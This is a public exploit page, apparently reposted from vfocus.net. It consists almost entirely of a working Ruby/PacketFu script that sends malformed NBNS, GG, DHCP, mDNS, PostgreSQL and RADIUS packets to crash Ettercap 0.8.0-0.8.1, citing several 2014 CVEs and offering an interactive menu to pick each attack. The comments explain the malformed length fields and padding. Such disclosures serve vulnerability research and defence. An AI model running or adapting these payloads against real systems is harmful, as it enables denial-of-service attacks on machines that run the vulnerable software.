Ettercap 0.8.0-0.8.1 - Multiple Denial of Service Vulnerabilities
来源:vfocus.net 作者:Sampanis 发布时间:2014-12-22  
#Exploit Title: 6 Remote ettercap Dos exploits to 1
#Date: 19/12/2014
#Exploit Author: Nick Sampanis
#Vendor Homepage: http://ettercap.github.io
#Software Link: https://github.com/Ettercap/ettercap/archive/v0.8.1.tar.gz
#Version: 8.0-8.1
#Tested on: Linux
#CVE: CVE-2014-6395 CVE-2014-9376 CVE-2014-9377 CVE-2014-9378 CVE-2014-9379
#Make sure that you have installed packetfu and pcaprub

require 'packetfu'
include PacketFu

# Argument check: every builder below reads its addresses from ARGV
# (ARGV[0] src_ip, ARGV[1] dst_ip, ARGV[2] src_mac, ARGV[3] iface), so the
# script prints the usage and stops unless all four are present.
if ARGV.length < 4
    puts "[-]Usage #{$PROGRAM_NAME} src_ip dst_ip src_mac iface"
    puts "[-]Use valid mac for your interface, if you dont know victim's ip address use broadcast"
    exit
end

# Menu case 1 (nbns plugin, CVE-2014-9377 per the menu text): builds one UDP
# frame, port 4444 -> 137, whose body is an NBNS query (12-byte header,
# encoded name, type, class) followed by 1000 bytes of "A" padding, and
# writes it raw to the interface named by ARGV[3].
# Addresses: ARGV[2] source MAC, broadcast destination MAC, ARGV[0] source
# IP, ARGV[1] destination IP. Returns whatever to_w returns; callers ignore it.
def nbns_header
    payload = [
        "\xa0\x2c\x01\x10\x00\x01\x00\x00\x00\x00\x00\x00", # 12-byte header
        "\x20\x46\x48\x45\x50\x46\x43\x45\x4c\x45\x48\x46", # name
        "\x43\x45\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43", # name (cont.)
        "\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00",         # name (end)
        "\x00\x20",                                         # type
        "\x00\x01",                                         # class
        "A" * 1000                                          # pad
    ].join
    frame = UDPPacket.new
    frame.eth_saddr, frame.eth_daddr = ARGV[2], "ff:ff:ff:ff:ff:ff"
    frame.ip_saddr, frame.ip_daddr = ARGV[0], ARGV[1]
    frame.udp_src, frame.udp_dst = 4444, 137
    frame.payload = payload
    frame.recalc
    frame.to_w(ARGV[3])
end
# Menu case 2 (gg dissector, CVE-2014-9376 per the menu text): builds one TCP
# frame, port 3333 -> 8074, carrying a 4-byte gg_type, a 4-byte gg_len
# (0x000003e8 little-endian = 1000, matching the pad) and 1000 bytes of "A",
# then writes it raw to the interface named by ARGV[3].
# Addresses: ARGV[2] source MAC, broadcast destination MAC, ARGV[0] source
# IP, ARGV[1] destination IP.
def gg_client
    payload = [
        "\x15\x00\x00\x00", # gg_type
        "\xe8\x03\x00\x00", # gg_len
        "A" * 1000          # pad
    ].join
    frame = TCPPacket.new
    frame.eth_saddr, frame.eth_daddr = ARGV[2], "ff:ff:ff:ff:ff:ff"
    frame.ip_saddr, frame.ip_daddr = ARGV[0], ARGV[1]
    frame.tcp_src, frame.tcp_dst = 3333, 8074
    frame.payload = payload
    frame.recalc
    frame.to_w(ARGV[3])
end
# Menu case 3 (dhcp dissector, CVE-2014-9376 per the menu text): builds one
# UDP frame, port 67 -> 4444, shaped like a DHCP reply: 236 bytes of 0x02
# (the fixed BOOTP header length), the DHCP options magic cookie, an option
# 0x35 block, an option 0x51 with a zero length byte and 3 bytes of padding.
# NOTE: unlike the other builders the IP addresses are reversed here —
# ARGV[1] is the IP source and ARGV[0] the IP destination — so the frame
# appears to come from the "dst_ip" argument. Written raw to ARGV[3].
def dhcp_header
    payload = [
        "\x02" * 236,       # BOOTP fixed header, all 0x02
        "\x63\x82\x53\x63", # DHCP magic cookie
        "\x35",             # option 0x35
        "\x00\x05\x00",
        "\x51",             # option 0x51
        "\x00",             # size
        "A" * 3             # pad
    ].join
    frame = UDPPacket.new
    frame.eth_saddr, frame.eth_daddr = ARGV[2], "ff:ff:ff:ff:ff:ff"
    frame.ip_saddr, frame.ip_daddr = ARGV[1], ARGV[0]
    frame.udp_src, frame.udp_dst = 67, 4444
    frame.payload = payload
    frame.recalc
    frame.to_w(ARGV[3])
end

# First frame of menu case 4 (mdns plugin, CVE-2014-9378 per the menu text):
# a well-formed mDNS query, UDP 4444 -> 5353, asking for "router.local"
# (type 1, class 1). Written raw to the interface named by ARGV[3].
# Addresses: ARGV[2] source MAC, broadcast destination MAC, ARGV[0] source
# IP, ARGV[1] destination IP. mdns_dos_header sends the follow-up frame.
def mdns_header
    payload = [
        "\x11\x11",                  # id
        "\x00\x00",                  # flags
        "\x00\x01",                  # questions
        "\x00\x00",                  # answer_rr
        "\x00\x00",                  # auth_rrs
        "\x00\x00",                  # additional_rr
        "\x06router\x05local\x00",   # name
        "\x00\x01",                  # type
        "\x00\x01"                   # class
    ].join
    frame = UDPPacket.new
    frame.eth_saddr, frame.eth_daddr = ARGV[2], "ff:ff:ff:ff:ff:ff"
    frame.ip_saddr, frame.ip_daddr = ARGV[0], ARGV[1]
    frame.udp_src, frame.udp_dst = 4444, 5353
    frame.payload = payload
    frame.recalc
    frame.to_w(ARGV[3])
end
# Second frame of menu case 4 (mdns plugin, CVE-2014-9378 per the menu text):
# same mDNS header as mdns_header, but the question name is a lone 0x01
# length byte with no label bytes after it, followed by type, class and 500
# bytes of "A". UDP 4444 -> 5353, written raw to the interface named by
# ARGV[3]; ARGV[2] source MAC, ARGV[0] source IP, ARGV[1] destination IP.
def mdns_dos_header
    payload = [
        "\x11\x11",  # id
        "\x00\x00",  # flags
        "\x00\x01",  # questions
        "\x00\x00",  # answer_rr
        "\x00\x00",  # auth_rrs
        "\x00\x00",  # additional_rr
        "\x01",      # name: single length byte, no label content
        "\x00\x01",  # type
        "\x00\x01",  # class
        "A" * 500    # pad
    ].join
    frame = UDPPacket.new
    frame.eth_saddr, frame.eth_daddr = ARGV[2], "ff:ff:ff:ff:ff:ff"
    frame.ip_saddr, frame.ip_daddr = ARGV[0], ARGV[1]
    frame.udp_src, frame.udp_dst = 4444, 5353
    frame.payload = payload
    frame.recalc
    frame.to_w(ARGV[3])
end

# Second frame of menu case 5 (postgresql dissector, CVE-2014-6395 per the
# menu text, noted there as 0.8.0 only): a TCP segment from port 5432 to
# port 3333 carrying a fixed byte string (copied verbatim; it begins with
# 0x52 'R' and contains "test"/"database"/"client_encoding"/"UNICODE"/
# "DateStyle"/"ISO"/"TimeZone"/"US/Pacific" as NUL-separated text).
# NOTE: the IP addresses are reversed relative to pgsql_client — ARGV[1] is
# the IP source and ARGV[0] the destination — so it plays the server side.
# Written raw to the interface named by ARGV[3].
def pgsql_server
    payload = "\x52\x00\x00\x00\x08\x00\x00\x00\x03\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00"
    frame = TCPPacket.new
    frame.eth_saddr, frame.eth_daddr = ARGV[2], "ff:ff:ff:ff:ff:ff"
    frame.ip_saddr, frame.ip_daddr = ARGV[1], ARGV[0]
    frame.tcp_src, frame.tcp_dst = 5432, 3333
    frame.payload = payload
    frame.recalc
    frame.to_w(ARGV[3])
end
# First frame of menu case 5 (postgresql dissector, CVE-2014-6395 per the
# menu text): a TCP segment from port 3333 to port 5432 carrying a fixed
# byte string (copied verbatim; it begins with 0x70 'p' and contains
# "user"/"test"/"database"/"client_encoding"/"UNICODE"/"DateStyle"/"ISO"/
# "TimeZone"/"US/Pacific" as NUL-separated text). ARGV[0] is the IP source
# and ARGV[1] the destination; written raw to the interface named by ARGV[3].
def pgsql_client
    payload = "\x70\x00\x00\x5b\x00\x03\x00\x00\x75\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00"
    frame = TCPPacket.new
    frame.eth_saddr, frame.eth_daddr = ARGV[2], "ff:ff:ff:ff:ff:ff"
    frame.ip_saddr, frame.ip_daddr = ARGV[0], ARGV[1]
    frame.tcp_src, frame.tcp_dst = 3333, 5432
    frame.payload = payload
    frame.recalc
    frame.to_w(ARGV[3])
end

# Third frame of menu case 5 (postgresql dissector, CVE-2014-6395 per the
# menu text): a TCP segment from port 3333 to port 5432 whose body is a
# 0x70 'p' byte, a 4-byte big-endian length 0x000003e9 (1001 = the 1000 "A"
# bytes plus the trailing NUL), 1000 bytes of "A" and a NUL terminator.
# ARGV[0] is the IP source and ARGV[1] the destination; written raw to the
# interface named by ARGV[3].
def pgsql_client_shell
    payload = [
        "\x70",
        "\x00\x00\x03\xe9", # len
        "A" * 1000,
        "\x00"
    ].join
    frame = TCPPacket.new
    frame.eth_saddr, frame.eth_daddr = ARGV[2], "ff:ff:ff:ff:ff:ff"
    frame.ip_saddr, frame.ip_daddr = ARGV[0], ARGV[1]
    frame.tcp_src, frame.tcp_dst = 3333, 5432
    frame.payload = payload
    frame.recalc
    frame.to_w(ARGV[3])
end

# Menu case 6 (radius dissector, CVE-2014-9379 per the menu text): one UDP
# frame, port 4444 -> 1645, carrying a fixed 50-byte literal copied verbatim.
# NOTE(review): if the body follows the standard RADIUS header, its third
# and fourth bytes (0x00 0xff) are a length field claiming 255 bytes while
# only 50 are sent — a length/datagram mismatch is what a detector would key on.
# ARGV[2] source MAC, broadcast destination MAC, ARGV[0] source IP, ARGV[1]
# destination IP; written raw to the interface named by ARGV[3].
def radius_header
    payload = "\x01\x01\x00\xff\x00\x01\x00\x00\x00\x00\x00\x00\x20\x46\x48\x00\x50\x46\x43\xff\x01\x00\x48\x46\x01\x00\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00\x00\x20\x00\x01"
    frame = UDPPacket.new
    frame.eth_saddr, frame.eth_daddr = ARGV[2], "ff:ff:ff:ff:ff:ff"
    frame.ip_saddr, frame.ip_daddr = ARGV[0], ARGV[1]
    frame.udp_src, frame.udp_dst = 4444, 1645
    frame.payload = payload
    frame.recalc
    frame.to_w(ARGV[3])
end

# Interactive menu: print the six cases, read one integer from stdin and run
# the matching builder(s) in the listed order (case 4 sends two frames, case
# 5 three). Any other number prints "[-]Unrecognized command ". Note that
# $stdin.gets returns nil on a closed stdin, so .chomp raises there, exactly
# as in the original case/when version.
[
    "[+]6 Remote ettercap Dos exploits to 1 by Nick Sampanis",
    "[+]-1- nbns plugin CVE-2014-9377",
    "[+]-2- gg dissector CVE-2014-9376",
    "[+]-3- dhcp dissector CVE-2014-9376",
    "[+]-4- mdns plugin CVE-2014-9378",
    "[+]-5- postgresql dissector CVE-2014-6395(works only in 8.0)",
    "[+]-6- radius dissector CVE-2014-9379"
].each { |line| puts line }
print "choice:"
choice = $stdin.gets.chomp.to_i

# Dispatch table: menu number -> [status line, lambda that sends the frame(s)].
actions = {
    1 => ["[+]Sending nbns packet..",      -> { nbns_header }],
    2 => ["[+]Sending client gg packet..", -> { gg_client }],
    3 => ["[+]Sending dhcp packet..",      -> { dhcp_header }],
    4 => ["[+]Sending mdns packet..",      -> { mdns_header; mdns_dos_header }],
    5 => ["[+]Sending pgsql packet..",     -> { pgsql_client; pgsql_server; pgsql_client_shell }],
    6 => ["[+]Sending radius packet..",    -> { radius_header }]
}

if actions.key?(choice)
    status, run = actions[choice]
    puts status
    run.call
else
    puts "[-]Unrecognized command "
end


 